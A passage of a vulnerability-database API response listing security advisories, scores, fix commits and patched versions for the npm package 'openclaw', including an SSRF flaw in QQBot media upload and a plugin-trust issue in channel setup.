                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-35619",
                "GHSA-68f8-9mhj-h2mp"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nfva-pukn-uqch"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89344?format=api",
            "vulnerability_id": "VCID-nkh4-j2pe-1qhr",
            "summary": "OpenClaw: QQBot direct media upload skipped URL SSRF validation\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe QQBot direct-upload media path could forward attacker-controlled image URLs without applying the SSRF validation used by the local download path. This could make configured QQBot media delivery request or relay URLs the operator did not intend to allow.\n\nThe affected path is limited to QQBot outbound media handling and does not expose arbitrary local files. Severity is low.\n\n## Fix\n\nOpenClaw now validates QQBot direct-upload media URLs before `uploadC2CMedia` and `uploadGroupMedia` direct-upload calls.\n\nFix commit:\n\n- `49db424c8001f2f419aad85f434894d8d85c1a09`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44117",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12782",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12786",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00045",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14064",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44117"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/49db424c8001f2f419aad85f434894d8d85c1a09",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/49db424c8001f2f419aad85f434894d8d85c1a09"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qg-j8jg-42q5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c4qg-j8jg-42q5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44117",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44117"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qqbot-direct-media-upload",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:33:16Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qqbot-direct-media-upload"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c4qg-j8jg-42q5",
                    "reference_id": "GHSA-c4qg-j8jg-42q5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-c4qg-j8jg-42q5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "CVE-2026-44117",
                "GHSA-c4qg-j8jg-42q5"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nkh4-j2pe-1qhr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89245?format=api",
            "vulnerability_id": "VCID-ns77-4wfj-9ka6",
            "summary": "OpenClaw: Channel setup catalog lookups could include untrusted workspace plugin shadows\n## Summary\n\nChannel setup catalog lookups could include untrusted workspace plugin shadows.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nChannel setup could resolve a workspace plugin shadow before a bundled channel plugin, causing setup-time plugin loading without the intended trust gate.\n\n## Technical Details\n\nThe fix routes setup catalog lookups through trusted catalog paths and uses `excludeWorkspace: true` where setup should not include workspace shadows.\n\n## Fix\n\nThe issue was fixed in the advisory fix branch. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `1fede43b948df40ca8674511d4bd08d39f6c5837`\n- PR: private advisory fork\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43571",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00047",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15125",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17378",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17414",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43571"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1fede43b948df40ca8674511d4bd08d39f6c5837",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1fede43b948df40ca8674511d4bd08d39f6c5837"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-82qx-6vj7-p8m2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-82qx-6vj7-p8m2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43571",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43571"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-plugin-shadow-resolution-in-channel-setup",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T11:54:14Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-untrusted-workspace-plugin-shadow-resolution-in-channel-setup"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-82qx-6vj7-p8m2",
                    "reference_id": "GHSA-82qx-6vj7-p8m2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-82qx-6vj7-p8m2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43571",
                "GHSA-82qx-6vj7-p8m2"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ns77-4wfj-9ka6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89423?format=api",
            "vulnerability_id": "VCID-nszj-2u6y-xqcb",
            "summary": "Duplicate Advisory: OpenClaw Bypasses DM Policy Separation via Synology Chat Webhook Path Collision\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rqp8-q22p-5j9q. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains a webhook path route replacement vulnerability in the Synology Chat extension that allows attackers to collapse multi-account configurations onto shared webhook paths. Attackers can exploit inherited or duplicate webhook paths to bypass per-account DM access control policies and replace route ownership across accounts.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35635",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35635"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-g8mc-c5f2-mqg7",
                    "reference_id": "GHSA-g8mc-c5f2-mqg7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-g8mc-c5f2-mqg7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
